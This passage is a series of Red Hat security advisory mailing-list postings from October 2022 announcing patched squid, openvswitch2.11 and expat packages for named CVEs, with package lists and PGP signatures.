Red Hat Security Advisory 2022-6839-01 - Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: squid security update  
Advisory ID:       RHSA-2022:6839-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6839  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-41318  
====================================================================  
1. Summary:

An update for squid is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Squid is a high-performance proxy caching server for web clients,  
supporting FTP, Gopher, and HTTP data objects.

Security Fix(es):

* squid: buffer-over-read in SSPI and SMB authentication (CVE-2022-41318)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the squid service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2129771 - CVE-2022-41318 squid: buffer-over-read in SSPI and SMB authentication

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
squid-5.2-1.el9_0.2.src.rpm

aarch64:  
squid-5.2-1.el9_0.2.aarch64.rpm  
squid-debuginfo-5.2-1.el9_0.2.aarch64.rpm  
squid-debugsource-5.2-1.el9_0.2.aarch64.rpm

ppc64le:  
squid-5.2-1.el9_0.2.ppc64le.rpm  
squid-debuginfo-5.2-1.el9_0.2.ppc64le.rpm  
squid-debugsource-5.2-1.el9_0.2.ppc64le.rpm

s390x:  
squid-5.2-1.el9_0.2.s390x.rpm  
squid-debuginfo-5.2-1.el9_0.2.s390x.rpm  
squid-debugsource-5.2-1.el9_0.2.s390x.rpm

x86_64:  
squid-5.2-1.el9_0.2.x86_64.rpm  
squid-debuginfo-5.2-1.el9_0.2.x86_64.rpm  
squid-debugsource-5.2-1.el9_0.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41318  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9A/tzjgjWX9erEAQgfZA/9HJUFYJLUsflB+655ZYluYALZgLYXdyUR  
5LdEVLft4Xk+0BNEII+F0ccPT6qYAFRQ65asWPVZtPKsOc9j8/B1AZ+LLXp9kYcV  
a6RfRVxjc/krmvAl7RysKNjg7QSagTsysMIZ3Bz+aiYKJuiESG5c7EedTHDTX2a2  
S0ZFHkIMID7NJrWAacnkYsSsMUO3Rz3kWBe163lC1Is8pSj0P+Z59qAu26Jrb8Jl  
0oMocTuVl+9QgVJF2GkybK45VxCVNlR8jNBsydrEilm/4rjdQAX0n2dxwYAL4Hu+  
Q6tf+Ifg6YsTPSQtex1ezSvq8cY4INmxAcfGy6mB3FUV1JXLcMmXbj7J6xsyX244  
eGI/4b8cAMOA6tFzx0cIMVvshHBRNw3iyp2Pi9M245VVBRBatGwQ4KVBq0XESKwB  
WArsEN9ZiJKi1F3qgwWIG6gL/l9bTHtQn1gkset3NnmVnT/JjJdzf5azP9TckEA7  
+WyRdC7Pcoi60aRrkMgMgycnLVdBNALY+rRJxSDy+pkmg0EIBQTUJoHHDqyKS/ei  
jebgINvq/zAMHzO+xzmIimJcqVbDU2pIPhTXYiFL0s5MJqsxSmJmG/Nc093QuHsE  
T7koB327qXVDu5RlGNf42Almw46/zWG7AaZtQUV7TOqM67LUCwsNPSJ6s1HCXZ+C  
LLsk+QabmmU=lAus  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6839-01

Red Hat Security Advisory 2022-6850-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openvswitch2.11 security update  
Advisory ID:       RHSA-2022:6850-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6850  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-2132  
====================================================================  
1. Summary:

An update for openvswitch2.11 is now available for Fast Datapath for Red  
Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 7 - noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* dpdk: DoS when a Vhost header crosses more than two descriptors and  
exhausts all mbufs (CVE-2022-2132)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2099475 - CVE-2022-2132 dpdk: DoS when a Vhost header crosses more than two descriptors and exhausts all mbufs

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 7:

Source:  
openvswitch2.11-2.11.3-96.2.el7fdp.src.rpm

noarch:  
openvswitch2.11-test-2.11.3-96.2.el7fdp.noarch.rpm

ppc64le:  
openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.ppc64le.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.ppc64le.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.ppc64le.rpm

s390x:  
openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.s390x.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.s390x.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.s390x.rpm

x86_64:  
openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-debuginfo-2.11.3-96.2.el7fdp.x86_64.rpm  
openvswitch2.11-devel-2.11.3-96.2.el7fdp.x86_64.rpm  
python-openvswitch2.11-2.11.3-96.2.el7fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2132  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz9A9NzjgjWX9erEAQhS6g//dFhnNsL6tYKMlk4Lrp34SksiKG0a7mVh  
pUzeQLBdgCIJ/AW/nYYAKdmLPAA9tbmYPGPEDq4lch7TmCqSTfurW+XJtddfiBjv  
MWFFGBEtTBZRB4T5RskKTjjgdwJdXSVX2D+LTFI7Z2ZdGvhtc6DcdYbvowP7S4Ni  
dZDx7ByueVuM0jJlHePgUMLv8SvT64SDPNWSJqsgM8MLWOMrBRc1RoOwYmWpRYJp  
ohvwvEbEiS6F8g6vDQGhVph2b0v5HYnjFvt5H3TaGVFlzbfsi+2orkXFnJQZ6ube  
I4HTboCKF4dYGiiSgMEOOYF6dbly4uw7cg+g8dlF8KpbQJKfGvyuD5WqKKnmFC+6  
Q031OQK6OzEfcq2LjJgnxq0CA4JjptO0dhfYPgZ8k1wRu/ZmHFs/fTydn7yihWj3  
ux3zkyjOIQUvpfxapxEfZ/DgiR1cU8zqN+Z5SGc365BdkYB2DlqUnFQFEqsLxIId  
R/HeMM1zn7MZ8V+n2pA2vV4HmKdYD8134ukT0B0El1cceERKDMZFKZLi/iXNIEhm  
xJQ+ibu8e/+JngOhmEmDHz2QQaEyIav6jceWCNig59By5oGfRJ8fvq7TQ1TtECDt  
b9imH8r/ylKbjhaPyvrGbPuV7ARuKQxs5/r/UhIAA1kvPrt1jGxST6jUeVO/Mi6K  
3jv+d9QUyS4!Lp  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6850-01

Red Hat Security Advisory 2022-6831-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6831-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6831  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
expat-2.2.5-4.el8_4.4.src.rpm

aarch64:  
expat-2.2.5-4.el8_4.4.aarch64.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.aarch64.rpm  
expat-debugsource-2.2.5-4.el8_4.4.aarch64.rpm  
expat-devel-2.2.5-4.el8_4.4.aarch64.rpm

ppc64le:  
expat-2.2.5-4.el8_4.4.ppc64le.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.ppc64le.rpm  
expat-debugsource-2.2.5-4.el8_4.4.ppc64le.rpm  
expat-devel-2.2.5-4.el8_4.4.ppc64le.rpm

s390x:  
expat-2.2.5-4.el8_4.4.s390x.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.s390x.rpm  
expat-debugsource-2.2.5-4.el8_4.4.s390x.rpm  
expat-devel-2.2.5-4.el8_4.4.s390x.rpm

x86_64:  
expat-2.2.5-4.el8_4.4.i686.rpm  
expat-2.2.5-4.el8_4.4.x86_64.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.i686.rpm  
expat-debuginfo-2.2.5-4.el8_4.4.x86_64.rpm  
expat-debugsource-2.2.5-4.el8_4.4.i686.rpm  
expat-debugsource-2.2.5-4.el8_4.4.x86_64.rpm  
expat-devel-2.2.5-4.el8_4.4.i686.rpm  
expat-devel-2.2.5-4.el8_4.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7svtzjgjWX9erEAQjaTg//ZLhz2g9jo1UyFDwiXv2ikm12gbo/z39B  
LrIK+cISbaj2ZmnYaaOVBctGaaM6iwjjw8EnDJUC3VkkIZLE80TD4D3mmUtQa8J/  
g35XEUZR5mxj/34UCH0eiHJ/IuDyEsNh7n8Tk4H8KjdNCUH5Z4F/m3DLXnG+rEnz  
Vc57sI/BBbMsLuYzdrV/+LUAXl3JNusv5MkkB6dlGd6BkVaJYP4YYCU8AZRYPaj4  
2u6lxeUYkrKnFAfgbI/uBxQvHyCZt+7ssbSQSMMkEzEYWbsRz143ykP7Q0ybZ/JL  
NwzflfH8czIESyWID1fwlwGJbBFIZkvLp8Zaf7hqhW/TdcGWb4yRXYnkaMzemYG1  
YUaJRJ0ix6F058q6SpoRNscjFIB9zOGkdtaZY1W0Uq4BqHwO5hj2lhPfEdfxOBlk  
BCfq5nbvOktd6jP9GntJHTJwA/nLyaj8fhBMWlzPqoSvfeL6SAmW+RV3SRsjpmGD  
vbrf5CeFsz2BawRAB+W63PYmYx60F1xarmhwlUqdt6FsF87V6k6hiV/NkZMvzs5Q  
l2e8PR9IUzkapp1pMDc5EC1RhBv8e6hS16C7iFnqEwmOFEF1hmLo2PK38jgOaEvH  
tiSmbSFKL4UQsn7byPAjpY8T+pKFxfVfAyOV67LfKzQ+T6m+Si/WHt+u6G2Yra3A  
wyAFjcY9yPE=livL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6831-01

Red Hat Security Advisory 2022-6832-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6832-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6832  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v. 8.2):

Source:  
expat-2.2.5-3.el8_2.3.src.rpm

aarch64:  
expat-2.2.5-3.el8_2.3.aarch64.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.aarch64.rpm  
expat-debugsource-2.2.5-3.el8_2.3.aarch64.rpm  
expat-devel-2.2.5-3.el8_2.3.aarch64.rpm

ppc64le:  
expat-2.2.5-3.el8_2.3.ppc64le.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.ppc64le.rpm  
expat-debugsource-2.2.5-3.el8_2.3.ppc64le.rpm  
expat-devel-2.2.5-3.el8_2.3.ppc64le.rpm

s390x:  
expat-2.2.5-3.el8_2.3.s390x.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.s390x.rpm  
expat-debugsource-2.2.5-3.el8_2.3.s390x.rpm  
expat-devel-2.2.5-3.el8_2.3.s390x.rpm

x86_64:  
expat-2.2.5-3.el8_2.3.i686.rpm  
expat-2.2.5-3.el8_2.3.x86_64.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.i686.rpm  
expat-debuginfo-2.2.5-3.el8_2.3.x86_64.rpm  
expat-debugsource-2.2.5-3.el8_2.3.i686.rpm  
expat-debugsource-2.2.5-3.el8_2.3.x86_64.rpm  
expat-devel-2.2.5-3.el8_2.3.i686.rpm  
expat-devel-2.2.5-3.el8_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7slNzjgjWX9erEAQhubRAAhOwHmqgokhhYOsZjMdN6KaDUqts5+19U  
/t3sBxAMYNehzxCDTKbt1hf2kEJDD7V7pcZ/VcbKyb2iWisYxPMVFxvRfc6tcB87  
M9UIKYyhC8CsFQKxijFpWRIOhhH/hEc2eetC1RlkAYotrBcmVthguNHmGgEfaN0N  
kZTXcBsXm9jrO8UhyJakXMvHD6C9PsMLTrJYcDZbBJZpLSoGvAOlFlKjaz2VMY+7  
HPqdKZpPqmHR2PxsEPYXmk0mzQxzxPW6o8oHiheaHz8CkKH+97oNXEawVjuczGxk  
62JNTB+OtVlpMt7ppngc0Go3eTmVj9Hr8uDDt83HU/sN5BhSoXRCZjVNodvhgjAN  
hSD8sAfQSosZh5fX1QXMIql16ZudyxlyIXdPub3w4I7ZUCG7v69cHSY1b8b9HKyF  
dpkgWrvtTaTVe0CSU3xcDijwng0MqJWLsAIjPvk3/DdJI4hdXd7iPGeQFkqTqiOA  
Lf8v45vwjK9ngfj1PbHptBlxG+bfYPyGCVPu10TniVlobrUXQaYrzut4lyZZFMyp  
EhFoenudt86L6vOo8s9/ZaIlZimhWH+zlcwdw4ksVQ/cCVeKTHG6v7lbTL07TOPs  
d38rmnyJd/ulrGC9T1Rj8ZMMQ3D+c1xF6R8g1leE/t3mD718bfjnrPN7umx/d/Av  
TQMo3Q0dgVo=qSey  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6832-01

Red Hat Security Advisory 2022-6834-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6834-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6834  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

ppc64:  
expat-2.1.0-15.el7_9.ppc.rpm  
expat-2.1.0-15.el7_9.ppc64.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc64.rpm  
expat-devel-2.1.0-15.el7_9.ppc.rpm  
expat-devel-2.1.0-15.el7_9.ppc64.rpm

ppc64le:  
expat-2.1.0-15.el7_9.ppc64le.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc64le.rpm  
expat-devel-2.1.0-15.el7_9.ppc64le.rpm

s390x:  
expat-2.1.0-15.el7_9.s390.rpm  
expat-2.1.0-15.el7_9.s390x.rpm  
expat-debuginfo-2.1.0-15.el7_9.s390.rpm  
expat-debuginfo-2.1.0-15.el7_9.s390x.rpm  
expat-devel-2.1.0-15.el7_9.s390.rpm  
expat-devel-2.1.0-15.el7_9.s390x.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
expat-debuginfo-2.1.0-15.el7_9.ppc.rpm  
expat-debuginfo-2.1.0-15.el7_9.ppc64.rpm  
expat-static-2.1.0-15.el7_9.ppc.rpm  
expat-static-2.1.0-15.el7_9.ppc64.rpm

ppc64le:  
expat-debuginfo-2.1.0-15.el7_9.ppc64le.rpm  
expat-static-2.1.0-15.el7_9.ppc64le.rpm

s390x:  
expat-debuginfo-2.1.0-15.el7_9.s390.rpm  
expat-debuginfo-2.1.0-15.el7_9.s390x.rpm  
expat-static-2.1.0-15.el7_9.s390.rpm  
expat-static-2.1.0-15.el7_9.s390x.rpm

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7sqdzjgjWX9erEAQjxyA//VKee7fxyq3Bih4oJvm9Lexgt4hgej3nR  
fJvpW6n+WTV6RRGtSSD37Lif1kav3bFiQBI4u2ZDrfEQ6ZETIcl6wKANdMI4zxYk  
Nh1CAxuWtnJsqQqu4pyViMT5pP5UgbO0suKps2TSTjq7f2Hok0IkLjEhqFlrfBA1  
owK2Pk6OltAvGKqLJuV9+MIgFGZNei5vuHCQwYS3V+CGXZpAnWwfRt69S2vRAOb0  
CB5eR4yF+IGn3eEebkArFEF97eGR9kqS4o63etEqMdoQ70FaPJKe9YM/y41Q/4gV  
/gD5H6caQk6ShO/O4UmabTw5TeiKzl7tJMxdYTd3rpBEZFNQiye45++4YY64+z0o  
uSNST+1PSz/8o+3XrpFKzs//ePLhYttC9/mLIIcVnrO1l3HTwKCP5rylMb/E3pJS  
Hc4QEUMw6orsFzNpMVtN9uiX23/Xzy1W4avKxlKSyf3PraXhiwz/GOz0R7mtaOKZ  
xH/8Pt3qKbOsCtmTx/SYx2ALqOm3jEC5s3zXfWjoFM6Um7wLYu1U2uWeuMHk5Hsu  
A2OADrOyY/88JODsLsugVVpvrAX0LrY8GOdXM1ZVRb2URdYL51bfQyEf2YEewplx  
x06H6MonBt/ZjLC4fba+v/yeM9TvdcDd7M7SgfEqwBniFhyTLUBWab00AR4t8ngY  
J17i8lcjGUc=IVzO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6834-01

Red Hat Security Advisory 2022-6833-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6833-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6833  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
expat-2.2.5-3.el8_1.2.src.rpm

aarch64:  
expat-2.2.5-3.el8_1.2.aarch64.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.aarch64.rpm  
expat-debugsource-2.2.5-3.el8_1.2.aarch64.rpm  
expat-devel-2.2.5-3.el8_1.2.aarch64.rpm

ppc64le:  
expat-2.2.5-3.el8_1.2.ppc64le.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.ppc64le.rpm  
expat-debugsource-2.2.5-3.el8_1.2.ppc64le.rpm  
expat-devel-2.2.5-3.el8_1.2.ppc64le.rpm

s390x:  
expat-2.2.5-3.el8_1.2.s390x.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.s390x.rpm  
expat-debugsource-2.2.5-3.el8_1.2.s390x.rpm  
expat-devel-2.2.5-3.el8_1.2.s390x.rpm

x86_64:  
expat-2.2.5-3.el8_1.2.i686.rpm  
expat-2.2.5-3.el8_1.2.x86_64.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.i686.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.x86_64.rpm  
expat-debugsource-2.2.5-3.el8_1.2.i686.rpm  
